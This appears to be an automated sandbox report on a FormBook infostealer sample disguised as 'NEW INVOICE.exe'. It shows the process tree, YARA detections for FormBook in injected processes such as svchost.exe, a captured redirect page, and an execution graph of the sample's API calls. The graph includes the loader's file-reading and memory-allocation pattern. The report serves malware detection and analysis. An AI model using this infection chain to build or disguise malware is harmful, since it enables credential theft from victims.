                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?v2x4if=BGHhcy5EGJH3TGsr0SdAyB/IY0TJfM6b0Iyf+x5ct/zMbQAi/VOw0CHGLkWqXJ1uj5ygw+VfiH3h5t6lg/ZXmjp4gFIYwdA6QsklqXxg8umNXWH5XR+T10UE2xCqQBbuLw==&bTU8=BDEpwP48zFO0YTL"}</script></head></html>


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:09:04:19
                                                                                  Start date:07/10/2024
                                                                                  Path:C:\Users\user\Desktop\NEW INVOICE.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\NEW INVOICE.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:1'331'957 bytes
                                                                                  MD5 hash:4720A64FA6C2A6E20E7FCC10B4338862
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:09:04:22
                                                                                  Start date:07/10/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\NEW INVOICE.exe"
                                                                                  Imagebase:0x2e0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2398092266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2398092266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2399026834.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2399026834.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:09:04:49
                                                                                  Start date:07/10/2024
                                                                                  Path:C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe"
                                                                                  Imagebase:0x2d0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3880668788.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3880668788.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:5
                                                                                  Start time:09:04:50
                                                                                  Start date:07/10/2024
                                                                                  Path:C:\Windows\SysWOW64\setupugc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\setupugc.exe"
                                                                                  Imagebase:0x820000
                                                                                  File size:118'784 bytes
                                                                                  MD5 hash:342CBB77B3F4B3F073DF2F042D20E121
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3879108456.0000000002950000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3879108456.0000000002950000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3878504026.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3878504026.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:6
                                                                                  Start time:09:05:03
                                                                                  Start date:07/10/2024
                                                                                  Path:C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe"
                                                                                  Imagebase:0x2d0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3882462274.0000000005240000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3882462274.0000000005240000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:8
                                                                                  Start time:09:05:15
                                                                                  Start date:07/10/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff79f9e0000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:3.2%
                                                                                    Dynamic/Decrypted Code Coverage:2.1%
                                                                                    Signature Coverage:3.4%
                                                                                    Total number of Nodes:1598
                                                                                    Total number of Limit Nodes:39
                                                                                    execution_graph 81850 3f73dd3 81853 3f73a48 81850->81853 81852 3f73e1f 81866 3f71478 81853->81866 81855 3f73ae7 81858 3f73b41 VirtualAlloc 81855->81858 81859 3f73b25 81855->81859 81864 3f73c48 CloseHandle 81855->81864 81865 3f73c58 VirtualFree 81855->81865 81869 3f74958 GetPEB 81855->81869 81857 3f73b18 CreateFileW 81857->81855 81857->81859 81858->81859 81860 3f73b62 ReadFile 81858->81860 81861 3f73d34 VirtualFree 81859->81861 81862 3f73d42 81859->81862 81860->81859 81863 3f73b80 VirtualAlloc 81860->81863 81861->81862 81862->81852 81863->81855 81863->81859 81864->81855 81865->81855 81871 3f748f8 GetPEB 81866->81871 81868 3f71b03 81868->81855 81870 3f74982 81869->81870 81870->81857 81872 3f74922 81871->81872 81872->81868 81873 444343 81876 444326 81873->81876 81875 44434e WriteFile 81877 444340 81876->81877 81878 4442c7 81876->81878 81877->81875 81883 40e190 SetFilePointerEx 81878->81883 81880 4442e0 SetFilePointerEx 81884 40e190 SetFilePointerEx 81880->81884 81882 4442ff 81882->81875 81883->81880 81884->81882 81885 46d22f 81888 46d098 81885->81888 81887 46d241 81889 46d0b5 81888->81889 81890 46d115 81889->81890 81891 46d0b9 81889->81891 81959 45c216 78 API calls 81890->81959 81936 41171a 81891->81936 81894 46d126 81896 46d0f8 81894->81896 81903 46d142 81894->81903 81955 4092c0 81896->81955 81897 46d0cc 81949 453063 81897->81949 81901 46d0fd 81901->81887 81904 46d1c8 81903->81904 81906 46d158 81903->81906 81965 4676a3 78 API calls 81904->81965 81910 453063 111 API calls 81906->81910 81907 46d0ea 81907->81903 81911 46d0ee 81907->81911 81909 46d1ce 81966 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 81909->81966 81919 46d15e 81910->81919 81911->81896 81954 44ade5 CloseHandle ctype 81911->81954 81912 46d18d 81960 467fce 82 API calls 81912->81960 81916 46d196 81961 4013a0 75 API calls 81916->81961 81917 46d1e7 81921 4092c0 VariantClear 81917->81921 81930 46d194 81917->81930 81919->81912 81919->81916 81920 46d1a2 81962 40df50 75 API calls 81920->81962 81921->81930 81923 46d1ac 81963 40d3b0 75 API calls 2 library calls 81923->81963 81925 46d224 81925->81887 81926 46d1b8 81964 467fce 82 API calls 81926->81964 81929 46d216 81967 44ade5 CloseHandle ctype 81929->81967 81930->81925 81932 40d900 81930->81932 81933 40d917 81932->81933 81934 40d909 81932->81934 81933->81934 81935 40d91c CloseHandle 81933->81935 81934->81929 81935->81929 81938 411724 81936->81938 81939 41173e 81938->81939 81942 411740 std::bad_alloc::bad_alloc 81938->81942 81968 4138ba 81938->81968 81986 411afc 6 API calls __decode_pointer 81938->81986 81939->81897 81948 40d940 76 API calls 81939->81948 81941 411766 81990 4116fd 67 API calls std::exception::exception 81941->81990 81942->81941 81987 411421 81942->81987 81944 411770 81991 41805b RaiseException 81944->81991 81947 41177e 81948->81897 81950 45306e 81949->81950 81951 45307a 81949->81951 81950->81951 82129 452e2a 111 API calls 5 library calls 81950->82129 81953 40dfa0 83 API calls 81951->81953 81953->81907 81954->81896 81956 4092c8 ctype 81955->81956 81957 429db0 VariantClear 81956->81957 81958 4092d5 ctype 81956->81958 81957->81958 81958->81901 81959->81894 81960->81930 81961->81920 81962->81923 81963->81926 81964->81930 81965->81909 81966->81917 81967->81925 81969 41396d 81968->81969 81980 4138cc 81968->81980 81999 411afc 6 API calls __decode_pointer 81969->81999 81971 413973 82000 417f23 67 API calls __getptd_noexit 81971->82000 81974 413965 81974->81938 81977 413929 RtlAllocateHeap 81977->81980 81978 4138dd 81978->81980 81992 418252 67 API calls 2 library calls 81978->81992 81993 4180a7 67 API calls 7 library calls 81978->81993 81994 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 81978->81994 81980->81974 81980->81977 81980->81978 81981 413959 81980->81981 81984 41395e 81980->81984 81995 41386b 67 API calls 4 library calls 81980->81995 81996 411afc 6 API calls __decode_pointer 81980->81996 81997 417f23 67 API calls __getptd_noexit 81981->81997 81998 417f23 67 API calls __getptd_noexit 81984->81998 81986->81938 82001 4113e5 81987->82001 81989 41142e 81989->81941 81990->81944 81991->81947 81992->81978 81993->81978 81995->81980 81996->81980 81997->81984 81998->81974 81999->81971 82000->81974 82002 4113f1 __close 82001->82002 82009 41181b 82002->82009 82008 411412 __close 82008->81989 82035 418407 82009->82035 82011 4113f6 82012 4112fa 82011->82012 82100 4169e9 TlsGetValue 82012->82100 82015 4169e9 __decode_pointer 6 API calls 82016 41131e 82015->82016 82017 4113a1 82016->82017 82110 4170e7 68 API calls 5 library calls 82016->82110 82032 41141b 82017->82032 82019 41133c 82022 411357 82019->82022 82023 411366 82019->82023 82031 411388 82019->82031 82020 41696e __encode_pointer 6 API calls 82021 411396 82020->82021 82024 41696e __encode_pointer 6 API calls 82021->82024 82111 417047 73 API calls _realloc 82022->82111 82023->82017 82026 411360 82023->82026 82024->82017 82026->82023 82028 41137c 82026->82028 82112 417047 73 API calls _realloc 82026->82112 82113 41696e TlsGetValue 82028->82113 82029 411376 82029->82017 82029->82028 82031->82020 82125 411824 82032->82125 82036 41841c 82035->82036 82037 41842f EnterCriticalSection 82035->82037 82042 418344 82036->82042 82037->82011 82039 418422 82039->82037 82070 4117af 67 API calls 3 library calls 82039->82070 82041 41842e 82041->82037 82043 418350 __close 82042->82043 82044 418360 82043->82044 82045 418378 82043->82045 82071 418252 67 API calls 2 library calls 82044->82071 82051 418386 __close 82045->82051 82074 416fb6 82045->82074 82047 418365 82072 4180a7 67 API calls 7 library calls 82047->82072 82051->82039 82052 41836c 82073 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 82052->82073 82053 4183a7 82057 418407 __lock 67 API calls 82053->82057 82054 418398 82080 417f23 67 API calls __getptd_noexit 82054->82080 82058 4183ae 82057->82058 82060 4183e2 82058->82060 82061 4183b6 82058->82061 82063 413a88 __woutput_l 67 API calls 82060->82063 82081 4189e6 InitializeCriticalSectionAndSpinCount __close 82061->82081 82065 4183d3 82063->82065 82064 4183c1 82064->82065 82082 413a88 82064->82082 82096 4183fe LeaveCriticalSection _doexit 82065->82096 82068 4183cd 82095 417f23 67 API calls __getptd_noexit 82068->82095 82070->82041 82071->82047 82072->82052 82077 416fbf 82074->82077 82075 4138ba _malloc 66 API calls 82075->82077 82076 416ff5 82076->82053 82076->82054 82077->82075 82077->82076 82078 416fd6 Sleep 82077->82078 82079 416feb 82078->82079 82079->82076 82079->82077 82080->82051 82081->82064 82084 413a94 __close 82082->82084 82083 413b0d __dosmaperr __close 82083->82068 82084->82083 82086 418407 __lock 65 API calls 82084->82086 82094 413ad3 82084->82094 82085 413ae8 RtlFreeHeap 82085->82083 82087 413afa 82085->82087 82091 413aab ___sbh_find_block 82086->82091 82099 417f23 67 API calls __getptd_noexit 82087->82099 82089 413aff GetLastError 82089->82083 82090 413ac5 82098 413ade LeaveCriticalSection _doexit 82090->82098 82091->82090 82097 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __fptostr 82091->82097 82094->82083 82094->82085 82095->82065 82096->82051 82097->82090 82098->82094 82099->82089 82101 416a01 82100->82101 82102 416a22 GetModuleHandleW 82100->82102 82101->82102 82105 416a0b TlsGetValue 82101->82105 82103 416a32 82102->82103 82104 416a3d GetProcAddress 82102->82104 82123 41177f Sleep GetModuleHandleW 82103->82123 82109 41130e 82104->82109 82107 416a16 82105->82107 82107->82102 82107->82109 82108 416a38 82108->82104 82108->82109 82109->82015 82110->82019 82111->82026 82112->82029 82114 4169a7 GetModuleHandleW 82113->82114 82115 416986 82113->82115 82117 4169c2 GetProcAddress 82114->82117 82118 4169b7 82114->82118 82115->82114 82116 416990 TlsGetValue 82115->82116 82121 41699b 82116->82121 82120 41699f 82117->82120 82124 41177f Sleep GetModuleHandleW 82118->82124 82120->82031 82121->82114 82121->82120 82122 4169bd 82122->82117 82122->82120 82123->82108 82124->82122 82128 41832d LeaveCriticalSection 82125->82128 82127 411420 82127->82008 82128->82127 82129->81951 82130 40116e 82131 401119 DefWindowProcW 82130->82131 82132 40f110 RegOpenKeyExW 82133 40f13c RegQueryValueExW RegCloseKey 82132->82133 82134 40f15f 82132->82134 82133->82134 82135 429212 82140 410b90 82135->82140 82138 411421 __cinit 74 API calls 82139 42922f 82138->82139 82141 410b9a __write_nolock 82140->82141 82142 41171a 75 API calls 82141->82142 82143 410c31 GetModuleFileNameW 82142->82143 82157 413db0 82143->82157 82145 410c66 _wcsncat 82160 413e3c 82145->82160 82148 41171a 75 API calls 82149 410ca3 _wcscpy 82148->82149 82150 410cd1 RegOpenKeyExW 82149->82150 82151 429bc3 RegQueryValueExW 82150->82151 82152 410cf7 82150->82152 82153 429cd9 RegCloseKey 82151->82153 82155 429bf2 _wcscat _wcslen _wcsncpy 82151->82155 82152->82138 82154 41171a 75 API calls 82154->82155 82155->82154 82156 429cd8 82155->82156 82156->82153 82163 413b95 82157->82163 82193 41abec 82160->82193 82164 413c2f 82163->82164 82170 413bae 82163->82170 82165 413d60 82164->82165 82166 413d7b 82164->82166 82189 417f23 67 API calls __getptd_noexit 82165->82189 82191 417f23 67 API calls __getptd_noexit 82166->82191 82169 413d65 82174 413cfb 82169->82174 82190 417ebb 6 API calls 2 library calls 82169->82190 82170->82164 82179 413c1d 82170->82179 82185 41ab19 67 API calls __woutput_l 82170->82185 82173 413d03 82173->82164 82173->82174 82176 413d8e 82173->82176 82174->82145 82175 413cb9 82175->82164 82177 413cd6 82175->82177 82187 41ab19 67 API calls __woutput_l 82175->82187 82192 41ab19 67 API calls __woutput_l 82176->82192 82177->82164 82177->82174 82181 413cef 82177->82181 82179->82164 82184 413c9b 82179->82184 82186 41ab19 67 API calls __woutput_l 82179->82186 82188 41ab19 67 API calls __woutput_l 82181->82188 82184->82173 82184->82175 82185->82179 82186->82184 82187->82177 82188->82174 82189->82169 82191->82169 82192->82174 82194 41ac02 82193->82194 82195 41abfd 82193->82195 82202 417f23 67 API calls __getptd_noexit 82194->82202 82195->82194 82198 41ac22 82195->82198 82197 41ac07 82203 417ebb 6 API calls 2 library calls 82197->82203 82201 410c99 82198->82201 82204 417f23 67 API calls __getptd_noexit 82198->82204 82201->82148 82202->82197 82204->82197 82205 401230 82206 4012c5 82205->82206 82207 401241 _memset 82205->82207 82220 401be0 82207->82220 82209 40126b 82210 4012ae KillTimer SetTimer 82209->82210 82211 42aa61 82209->82211 82212 401298 82209->82212 82210->82206 82215 42aa8b Shell_NotifyIconW 82211->82215 82216 42aa69 Shell_NotifyIconW 82211->82216 82213 4012a2 82212->82213 82214 42aaac 82212->82214 82213->82210 82217 42aaf8 Shell_NotifyIconW 82213->82217 82218 42aad7 Shell_NotifyIconW 82214->82218 82219 42aab5 Shell_NotifyIconW 82214->82219 82215->82210 82216->82210 82217->82210 82218->82210 82219->82210 82221 401bfb 82220->82221 82241 401cde 82220->82241 82242 4013a0 75 API calls 82221->82242 82223 401c0b 82224 42a9a0 LoadStringW 82223->82224 82225 401c18 82223->82225 82227 42a9bb 82224->82227 82243 4021e0 82225->82243 82256 40df50 75 API calls 82227->82256 82228 401c2d 82230 401c3a 82228->82230 82231 42a9cd 82228->82231 82230->82227 82232 401c44 82230->82232 82257 40d3b0 75 API calls 2 library calls 82231->82257 82255 40d3b0 75 API calls 2 library calls 82232->82255 82235 42a9dc 82236 42a9f0 82235->82236 82238 401c53 _memset _wcscpy _wcsncpy 82235->82238 82258 40d3b0 75 API calls 2 library calls 82236->82258 82240 401cc2 Shell_NotifyIconW 82238->82240 82239 42a9fe 82240->82241 82241->82209 82242->82223 82244 4021f1 _wcslen 82243->82244 82245 42a598 82243->82245 82248 402205 82244->82248 82249 402226 82244->82249 82261 40c740 82245->82261 82247 42a5a2 82259 404020 75 API calls ctype 82248->82259 82260 401380 75 API calls 82249->82260 82252 40220c _memcpy_s 82252->82228 82253 40222d 82253->82247 82254 41171a 75 API calls 82253->82254 82254->82252 82255->82238 82256->82238 82257->82235 82258->82239 82259->82252 82260->82253 82262 40c752 82261->82262 82263 40c747 82261->82263 82262->82247 82263->82262 82266 402ae0 75 API calls _memcpy_s 82263->82266 82265 42a572 _memcpy_s 82265->82247 82266->82265 82267 4034b0 82268 4034b9 82267->82268 82269 4034bd 82267->82269 82270 42a0ba 82269->82270 82271 41171a 75 API calls 82269->82271 82272 4034fe _memcpy_s ctype 82271->82272 82273 416193 82310 41718c 82273->82310 82275 41619f GetStartupInfoW 82278 4161c2 82275->82278 82311 41aa31 HeapCreate 82278->82311 82279 416212 82313 416e29 GetModuleHandleW 82279->82313 82282 416223 __RTC_Initialize 82347 41b669 82282->82347 82286 416231 82287 41623d GetCommandLineW 82286->82287 82416 4117af 67 API calls 3 library calls 82286->82416 82362 42235f GetEnvironmentStringsW 82287->82362 82290 41623c 82290->82287 82291 41624c 82368 4222b1 GetModuleFileNameW 82291->82368 82293 416256 82294 416261 82293->82294 82417 4117af 67 API calls 3 library calls 82293->82417 82372 422082 82294->82372 82298 416272 82385 41186e 82298->82385 82301 416279 82303 416284 __wwincmdln 82301->82303 82419 4117af 67 API calls 3 library calls 82301->82419 82391 40d7f0 82303->82391 82306 4162b3 82421 411a4b 67 API calls _doexit 82306->82421 82309 4162b8 __close 82310->82275 82312 416206 82311->82312 82312->82279 82414 41616a 67 API calls 3 library calls 82312->82414 82314 416e44 82313->82314 82315 416e3d 82313->82315 82317 416fac 82314->82317 82318 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 82314->82318 82422 41177f Sleep GetModuleHandleW 82315->82422 82432 416ad5 70 API calls 2 library calls 82317->82432 82321 416e97 TlsAlloc 82318->82321 82320 416e43 82320->82314 82323 416218 82321->82323 82324 416ee5 TlsSetValue 82321->82324 82323->82282 82415 41616a 67 API calls 3 library calls 82323->82415 82324->82323 82325 416ef6 82324->82325 82423 411a69 6 API calls 3 library calls 82325->82423 82327 416efb 82328 41696e __encode_pointer 6 API calls 82327->82328 82329 416f06 82328->82329 82330 41696e __encode_pointer 6 API calls 82329->82330 82331 416f16 82330->82331 82332 41696e __encode_pointer 6 API calls 82331->82332 82333 416f26 82332->82333 82334 41696e __encode_pointer 6 API calls 82333->82334 82335 416f36 82334->82335 82424 41828b InitializeCriticalSectionAndSpinCount __alloc_osfhnd 82335->82424 82337 416f43 82337->82317 82338 4169e9 __decode_pointer 6 API calls 82337->82338 82339 416f57 82338->82339 82339->82317 82425 416ffb 82339->82425 82342 4169e9 __decode_pointer 6 API calls 82343 416f8a 82342->82343 82343->82317 82344 416f91 82343->82344 82431 416b12 67 API calls 5 library calls 82344->82431 82346 416f99 GetCurrentThreadId 82346->82323 82451 41718c 82347->82451 82349 41b675 GetStartupInfoA 82350 416ffb __calloc_crt 67 API calls 82349->82350 82358 41b696 82350->82358 82351 41b8b4 __close 82351->82286 82352 41b831 GetStdHandle 82357 41b7fb 82352->82357 82353 41b896 SetHandleCount 82353->82351 82354 416ffb __calloc_crt 67 API calls 82354->82358 82355 41b843 GetFileType 82355->82357 82356 41b77e 82356->82351 82356->82357 82359 41b7a7 GetFileType 82356->82359 82452 4189e6 InitializeCriticalSectionAndSpinCount __close 82356->82452 82357->82351 82357->82352 82357->82353 82357->82355 82453 4189e6 InitializeCriticalSectionAndSpinCount __close 82357->82453 82358->82351 82358->82354 82358->82356 82358->82357 82359->82356 82363 422370 82362->82363 82364 422374 82362->82364 82363->82291 82365 416fb6 __malloc_crt 67 API calls 82364->82365 82366 422395 _memcpy_s 82365->82366 82367 42239c FreeEnvironmentStringsW 82366->82367 82367->82291 82369 4222e6 _wparse_cmdline 82368->82369 82370 416fb6 __malloc_crt 67 API calls 82369->82370 82371 422329 _wparse_cmdline 82369->82371 82370->82371 82371->82293 82373 42209a _wcslen 82372->82373 82377 416267 82372->82377 82374 416ffb __calloc_crt 67 API calls 82373->82374 82380 4220be _wcslen 82374->82380 82375 422123 82376 413a88 __woutput_l 67 API calls 82375->82376 82376->82377 82377->82298 82418 4117af 67 API calls 3 library calls 82377->82418 82378 416ffb __calloc_crt 67 API calls 82378->82380 82379 422149 82381 413a88 __woutput_l 67 API calls 82379->82381 82380->82375 82380->82377 82380->82378 82380->82379 82383 422108 82380->82383 82454 426349 67 API calls __woutput_l 82380->82454 82381->82377 82383->82380 82455 417d93 10 API calls 3 library calls 82383->82455 82387 41187c __IsNonwritableInCurrentImage 82385->82387 82456 418486 82387->82456 82388 41189a __initterm_e 82389 411421 __cinit 74 API calls 82388->82389 82390 4118b9 __IsNonwritableInCurrentImage __initterm 82388->82390 82389->82390 82390->82301 82392 431bcb 82391->82392 82393 40d80c 82391->82393 82394 4092c0 VariantClear 82393->82394 82395 40d847 82394->82395 82460 40eb50 82395->82460 82398 40d877 82463 411ac6 67 API calls 4 library calls 82398->82463 82401 40d888 82464 411b24 67 API calls __woutput_l 82401->82464 82403 40d891 82465 40f370 SystemParametersInfoW SystemParametersInfoW 82403->82465 82405 40d89f 82466 40d6d0 GetCurrentDirectoryW 82405->82466 82407 40d8a7 SystemParametersInfoW 82408 40d8d4 82407->82408 82409 40d8cd FreeLibrary 82407->82409 82410 4092c0 VariantClear 82408->82410 82409->82408 82411 40d8dd 82410->82411 82412 4092c0 VariantClear 82411->82412 82413 40d8e6 82412->82413 82413->82306 82420 411a1f 67 API calls _doexit 82413->82420 82414->82279 82415->82282 82416->82290 82417->82294 82418->82298 82419->82303 82420->82306 82421->82309 82422->82320 82423->82327 82424->82337 82428 417004 82425->82428 82427 416f70 82427->82317 82427->82342 82428->82427 82429 417022 Sleep 82428->82429 82433 422452 82428->82433 82430 417037 82429->82430 82430->82427 82430->82428 82431->82346 82432->82323 82434 42245e __close 82433->82434 82435 422476 82434->82435 82445 422495 _memset 82434->82445 82446 417f23 67 API calls __getptd_noexit 82435->82446 82437 42247b 82447 417ebb 6 API calls 2 library calls 82437->82447 82439 422507 HeapAlloc 82439->82445 82440 42248b __close 82440->82428 82442 418407 __lock 66 API calls 82442->82445 82445->82439 82445->82440 82445->82442 82448 41a74c 5 API calls 2 library calls 82445->82448 82449 42254e LeaveCriticalSection _doexit 82445->82449 82450 411afc 6 API calls __decode_pointer 82445->82450 82446->82437 82448->82445 82449->82445 82450->82445 82451->82349 82452->82356 82453->82357 82454->82380 82455->82383 82458 41848c 82456->82458 82457 41696e __encode_pointer 6 API calls 82457->82458 82458->82457 82459 4184a4 82458->82459 82459->82388 82504 40eb70 82460->82504 82463->82401 82464->82403 82465->82405 82508 401f80 82466->82508 82468 40d6f1 IsDebuggerPresent 82469 431a9d MessageBoxA 82468->82469 82470 40d6ff 82468->82470 82471 431ab6 82469->82471 82470->82471 82472 40d71f 82470->82472 82601 403e90 75 API calls 3 library calls 82471->82601 82578 40f3b0 82472->82578 82476 40d73a GetFullPathNameW 82598 401440 127 API calls _wcscat 82476->82598 82478 40d77a 82479 40d782 82478->82479 82480 431b09 SetCurrentDirectoryW 82478->82480 82481 40d78b 82479->82481 82602 43604b 6 API calls 82479->82602 82480->82479 82590 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 82481->82590 82484 431b28 82484->82481 82486 431b30 GetModuleFileNameW 82484->82486 82488 431ba4 GetForegroundWindow ShellExecuteW 82486->82488 82489 431b4c 82486->82489 82491 40d7c7 82488->82491 82603 401b70 75 API calls 2 library calls 82489->82603 82490 40d795 82498 40d7a8 82490->82498 82599 40e1e0 97 API calls _memset 82490->82599 82495 40d7d1 SetCurrentDirectoryW 82491->82495 82494 431b5a 82604 40d3b0 75 API calls 2 library calls 82494->82604 82495->82407 82497 431b66 82605 40d3b0 75 API calls 2 library calls 82497->82605 82498->82491 82600 401000 Shell_NotifyIconW _memset 82498->82600 82501 431b72 GetForegroundWindow ShellExecuteW 82502 431b9f 82501->82502 82502->82491 82503 40eba0 LoadLibraryA GetProcAddress 82503->82398 82505 40d86e 82504->82505 82506 40eb76 LoadLibraryA 82504->82506 82505->82398 82505->82503 82506->82505 82507 40eb87 GetProcAddress 82506->82507 82507->82505 82606 40e680 75 API calls 82508->82606 82510 401f90 82607 402940 75 API calls __write_nolock 82510->82607 82512 401fa2 GetModuleFileNameW 82608 40ff90 82512->82608 82514 401fbd 82620 4107b0 75 API calls 82514->82620 82516 401fd6 82621 401b70 75 API calls 2 library calls 82516->82621 82518 401fe4 82622 4019e0 76 API calls 82518->82622 82520 401ff2 82521 4092c0 VariantClear 82520->82521 82522 402002 82521->82522 82623 401b70 75 API calls 2 library calls 82522->82623 82524 40201c 82624 4019e0 76 API calls 82524->82624 82526 40202c 82625 401b70 75 API calls 2 library calls 82526->82625 82528 40203c 82626 40c3e0 75 API calls 82528->82626 82530 40204d 82627 40c060 82530->82627 82534 40206e 82633 4115d0 79 API calls 2 library calls 82534->82633 82536 40207d 82537 42c174 82536->82537 82538 402088 82536->82538 82644 401a70 75 API calls 82537->82644 82634 4115d0 79 API calls 2 library calls 82538->82634 82541 42c189 82645 401a70 75 API calls 82541->82645 82542 402093 82542->82541 82543 40209e 82542->82543 82635 4115d0 79 API calls 2 library calls 82543->82635 82546 42c1a7 82548 42c1b0 GetModuleFileNameW 82546->82548 82547 4020a9 82547->82548 82549 4020b4 82547->82549 82646 401a70 75 API calls 82548->82646 82636 4115d0 79 API calls 2 library calls 82549->82636 82552 4020bf 82561 42c20a _wcscpy 82552->82561 82569 402107 82552->82569 82637 401a70 75 API calls 82552->82637 82553 42c1e2 82647 40df50 75 API calls 82553->82647 82555 42c1f1 82648 401a70 75 API calls 82555->82648 82556 402119 82559 42c243 82556->82559 82639 40e7e0 76 API calls 82556->82639 82560 42c201 82560->82561 82649 401a70 75 API calls 82561->82649 82563 4020e5 _wcscpy 82638 401a70 75 API calls 82563->82638 82565 402132 82640 40d030 76 API calls 82565->82640 82568 40213e 82570 4092c0 VariantClear 82568->82570 82569->82556 82569->82561 82573 402148 82570->82573 82571 402184 82575 4092c0 VariantClear 82571->82575 82573->82571 82641 40d030 76 API calls 82573->82641 82642 40e640 76 API calls 82573->82642 82643 401a70 75 API calls 82573->82643 82577 402196 ctype 82575->82577 